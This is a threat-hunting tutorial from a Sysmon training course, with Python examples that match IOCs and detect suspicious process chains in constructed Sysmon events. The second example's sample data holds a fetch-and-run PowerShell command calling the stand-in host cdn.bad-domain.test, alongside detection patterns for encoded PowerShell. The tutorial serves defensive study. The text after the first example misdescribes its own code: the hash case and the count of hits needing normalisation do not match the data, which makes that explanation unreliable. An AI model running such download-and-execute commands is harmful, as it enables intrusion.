
In the Sysmon 101 course, we teach the Sysmon tool from the basics to advanced use. This is the first part of the Sysmon 101 training course, and in this part we are going to talk about threat hunting.

What Is Threat Hunting?

Threat hunting is the proactive process of searching our environment for threats that may already be present but have not been detected by our existing controls. Rather than waiting for an alert, we continuously analyze our environment to find these threats and stop them before they cause damage.

What Is a Threat?

A threat is any attack or risk that can harm the organization and its assets. Examples of threats include:

  • Ransomware
  • Malware
  • DDoS and DoS attacks
  • Phishing attacks
  • etc.

What are You Hunting For?

Network Artifacts – such as malware network connections, C&C (command and control) server information, etc.

Host Artifacts – such as DLL files, file hash values, Windows registry keys, etc.

Indicator of Compromise (IOC) – evidence that a compromise has already happened, such as a known-malicious file hash, IP address or domain found in forensic data and log files.

Indicator of Attack (IOA) – similar to an IOC, but focused on the attacker's behaviour (for example, an Office application launching PowerShell) rather than on a specific artifact. An IOA describes an attack in progress and still works when the attacker changes tools or infrastructure.

What Type Of Threat Hunting?

There are different types of threat hunting, and we describe each of them here.

Type 1 – Structured Hunting

Structured hunting is driven by a hypothesis about attacker behaviour. It uses IOAs and the tactics, techniques and procedures (TTPs) of an attacker, for example a MITRE ATT&CK technique, to search for that behaviour in the environment, so it can identify an attack before the attacker completes it.

Type 2 – Unstructured Hunting

An unstructured hunt is initiated by a trigger, which is often an indicator of compromise (IOC) such as a known-malicious hash or IP address showing up in the logs. When the trigger fires, the threat hunter looks at what happened on the affected host before and after the detection to understand the full attack, not only the single event that matched.

Threat Hunting Model

Threat hunting can be carried out using different models. In this section, we talk about three of them.

1 Intel-Based Model

In this model, threat hunters use IOCs to identify and hunt for threats. The IOCs come from threat intelligence about known attacks and include IP addresses, domain names, hash values, file paths, file names and registry paths.

Threat intelligence providers share these IOCs in the Structured Threat Information Expression (STIX) format, delivered over the Trusted Automated Exchange of Intelligence Information (TAXII) protocol, and the threat hunter loads them into the SIEM to match them against the organization's logs.
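The following is an added example (it is not code from the Sysmon 101 post) of an intel-based hunt that also shows the trigger and the pre/post-detection pivot of an unstructured hunt: a small IOC list of the artifact types listed above (hash, domain, IP address, registry path) is matched against constructed Sysmon-style events, and for each hit the events before and after it on the same host are collected. The IOC values, host names, addresses and events are all made up for the example; the Sysmon event IDs used are 1 (process create), 3 (network connection), 13 (registry value set) and 22 (DNS query).

```python
"""Intel-based IOC hunt with pre/post-detection context (added example)."""
from datetime import datetime, timedelta

# Constructed IOC feed: (artifact type, value) pairs as an intel feed (for
# example a STIX bundle pulled over TAXII) would supply them. Mixed case and
# a trailing dot are included on purpose to show why normalisation matters.
IOC_FEED = [
    ("sha256", "a1b2c3d4" * 8),
    ("domain", "CDN.Bad-Domain.test"),
    ("ipv4", "203.0.113.7"),
    ("registry", r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater"),
]

# Constructed Sysmon-style events from two invented hosts. Field names follow
# Sysmon's own (Image, Hashes, DestinationIp, TargetObject, QueryName).
EVENTS = [
    {"time": "2024-05-01T09:59:30", "host": "WS-042", "event_id": 1,
     "Image": r"C:\Windows\System32\notepad.exe", "Hashes": "SHA256=" + "0" * 64},
    {"time": "2024-05-01T10:00:00", "host": "WS-042", "event_id": 1,
     "Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "Hashes": "MD5=" + "00" * 16 + ",SHA256=" + "a1b2c3d4" * 8},
    {"time": "2024-05-01T10:00:03", "host": "WS-042", "event_id": 22, "QueryName": "intranet.corp.test"},
    {"time": "2024-05-01T10:00:05", "host": "WS-042", "event_id": 22, "QueryName": "cdn.bad-domain.test."},
    {"time": "2024-05-01T10:00:06", "host": "WS-042", "event_id": 3, "DestinationIp": "203.0.113.7", "DestinationPort": 443},
    {"time": "2024-05-01T10:00:08", "host": "WS-042", "event_id": 13,
     "TargetObject": r"HKU\S-1-5-21-1111\Software\Microsoft\Windows\CurrentVersion\Run\Updater"},
    {"time": "2024-05-01T10:00:07", "host": "WS-043", "event_id": 3, "DestinationIp": "203.0.113.7", "DestinationPort": 443},
]


def normalise(kind, value):
    """Canonical form so feed values and telemetry compare equal regardless of case or trailing dots."""
    value = value.strip()
    if kind == "sha256":
        return value.upper()
    if kind == "domain":
        return value.lower().rstrip(".")
    if kind == "registry":
        return value.lower()
    return value  # ipv4 is compared as written


def load_iocs(feed):
    """Build {artifact type: set of normalised values} from a feed."""
    store = {}
    for kind, value in feed:
        store.setdefault(kind, set()).add(normalise(kind, value))
    return store


def artifacts(event):
    """Yield the (kind, value) artifacts carried by one event, chosen by Sysmon event ID."""
    eid = event["event_id"]
    if eid == 1:  # process create: Hashes="MD5=..,SHA256=..,IMPHASH=.."
        for part in event.get("Hashes", "").split(","):
            algo, _, digest = part.partition("=")
            if algo.strip().upper() == "SHA256":
                yield "sha256", digest
    elif eid == 3:
        yield "ipv4", event["DestinationIp"]
    elif eid == 13:
        yield "registry", event["TargetObject"]
    elif eid == 22:
        yield "domain", event["QueryName"]


def hunt_iocs(events, store):
    """Intel-based hunt: every event artifact is looked up in the IOC store."""
    hits = []
    for ev in events:
        for kind, value in artifacts(ev):
            if normalise(kind, value) in store.get(kind, ()):
                hits.append({"time": ev["time"], "host": ev["host"], "event_id": ev["event_id"],
                             "kind": kind, "value": value})
    return hits


def context(events, hit, window_seconds):
    """Unstructured pivot: events on the hit's host within the window before and after it.

    Events with exactly the hit's timestamp (the hit itself) are left out of both lists."""
    t = datetime.fromisoformat(hit["time"])
    w = timedelta(seconds=window_seconds)
    before, after = [], []
    for ev in events:
        if ev["host"] != hit["host"]:
            continue
        et = datetime.fromisoformat(ev["time"])
        if t - w <= et < t:
            before.append(ev)
        elif t < et <= t + w:
            after.append(ev)
    key = lambda e: e["time"]  # ISO-8601 strings sort chronologically
    return sorted(before, key=key), sorted(after, key=key)


STORE = load_iocs(IOC_FEED)

if __name__ == "__main__":
    for hit in hunt_iocs(EVENTS, STORE):
        before, after = context(EVENTS, hit, 10)
        print(f"{hit['time']} {hit['host']} EID {hit['event_id']} {hit['kind']}={hit['value']} "
              f"(pre={len(before)}, post={len(after)} events within 10 s)")
```

The normalisation step is the part that matters in practice: the feed spells the domain in mixed case and Sysmon logs the DNS query with a trailing dot, and the hash arrives lowercase while the feed has it uppercase. Without it, three of the five hits above would be missed.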

2 Hypothesis Hunting Model

In this model of threat hunting, we build a hypothesis about how an attacker would operate, using knowledge bases such as MITRE ATT&CK and other components such as playbooks, IOAs and the TTPs that have been published for known attacks. Based on the environment in which we are supposed to identify threats, we turn the hypothesis into a search for the corresponding malicious behaviour.
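As an added example (not code from the post or from MITRE), here is a hypothesis-driven hunt in the style of the structured hunting type and the hypothesis model above: each hypothesis is written as a behaviour rule (an IOA) tagged with the MITRE ATT&CK technique it tests for, an exclusion list removes a known-good baseline, and the rules are run over constructed Sysmon Event ID 1 (process create) records. The hosts, users, command lines and the "MgmtAgent" management tool in the exclusion list are invented for the example.

```python
"""Hypothesis-driven (structured) hunt over Sysmon process-create events (added example)."""
import base64
import re
from pathlib import PureWindowsPath

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# -EncodedCommand and the common abbreviations powershell.exe accepts, followed by base64.
ENCODED_ARG = re.compile(r"(?i)(?<!\S)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")
# Hypothetical baseline: a management agent known in this environment to launch encoded PowerShell.
TRUSTED_PARENTS = {r"c:\program files\mgmtagent\agent.exe"}


def exe(path):
    """File name of a Windows path, lower-cased, so rules are not fooled by path or case."""
    return PureWindowsPath(path).name.lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64) or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # not really base64 / not UTF-16
        return None


# Each hypothesis: the behaviour (IOA) we expect, the ATT&CK technique it belongs to,
# the match predicate, and an optional exclusion that removes the known-good baseline.
RULES = [
    {"name": "Office application spawned a script interpreter",
     "technique": "T1204.002",  # User Execution: Malicious File
     "match": lambda e: exe(e["ParentImage"]) in OFFICE_APPS and exe(e["Image"]) in INTERPRETERS},
    {"name": "PowerShell launched with an encoded command",
     "technique": "T1059.001",  # Command and Scripting Interpreter: PowerShell
     "match": lambda e: exe(e["Image"]) in {"powershell.exe", "pwsh.exe"}
                        and ENCODED_ARG.search(e["CommandLine"]) is not None,
     "exclude": lambda e: e["ParentImage"].lower() in TRUSTED_PARENTS},
    {"name": "WMI provider host spawned a shell",
     "technique": "T1047",  # Windows Management Instrumentation
     "match": lambda e: exe(e["ParentImage"]) == "wmiprvse.exe" and exe(e["Image"]) in INTERPRETERS},
]


def hunt(events, rules=RULES):
    """Run every hypothesis over every event; a hit records the rule, technique and decoded payload."""
    hits = []
    for ev in events:
        for rule in rules:
            if not rule["match"](ev) or rule.get("exclude", lambda e: False)(ev):
                continue
            hits.append({"time": ev["time"], "host": ev["host"], "rule": rule["name"],
                         "technique": rule["technique"], "image": ev["Image"],
                         "parent": ev["ParentImage"],
                         "decoded": decode_encoded_command(ev["CommandLine"])})
    return hits


def encode_ps(script):
    """Build a -EncodedCommand argument the way PowerShell expects it (used only to construct sample data)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
# Constructed Sysmon Event ID 1 records (hosts, users and the URL are invented).
EVENTS = [
    {"time": "2024-05-01T10:00:00", "host": "WS-042", "User": "CORP\\alice",
     "ParentImage": r"C:\Windows\explorer.exe", "Image": WORD,
     "CommandLine": r'"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.docm"'},
    {"time": "2024-05-01T10:00:04", "host": "WS-042", "User": "CORP\\alice",
     "ParentImage": WORD, "Image": PS,
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://cdn.bad-domain.test/a')")},
    {"time": "2024-05-01T10:02:10", "host": "SRV-07", "User": "NT AUTHORITY\\NETWORK SERVICE",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"time": "2024-05-01T10:05:00", "host": "WS-042", "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": r"C:\Program Files\MgmtAgent\agent.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -EncodedCommand " + encode_ps("Get-Service")},
    {"time": "2024-05-01T10:06:00", "host": "WS-042", "User": "CORP\\alice",
     "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for hit in hunt(EVENTS):
        print(f"{hit['time']} {hit['host']} [{hit['technique']}] {hit['rule']}: "
              f"{exe(hit['parent'])} -> {exe(hit['image'])} decoded={hit['decoded']!r}")
```

The second event above fires two hypotheses at once (Office spawning PowerShell, and an encoded command line), which is how a structured hunt surfaces a phishing chain without knowing the attachment's hash in advance; the management agent's encoded PowerShell is suppressed by the baseline exclusion, which is where most of the tuning effort in a real hunt goes.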

3 Custom Hunting Model

This model is based on situational awareness and industry-specific hunting methods. It looks for anomalies in the data collected by SIEM and EDR tools and is customized to the customer's requirements, so it can combine elements of the intel-based and hypothesis models.
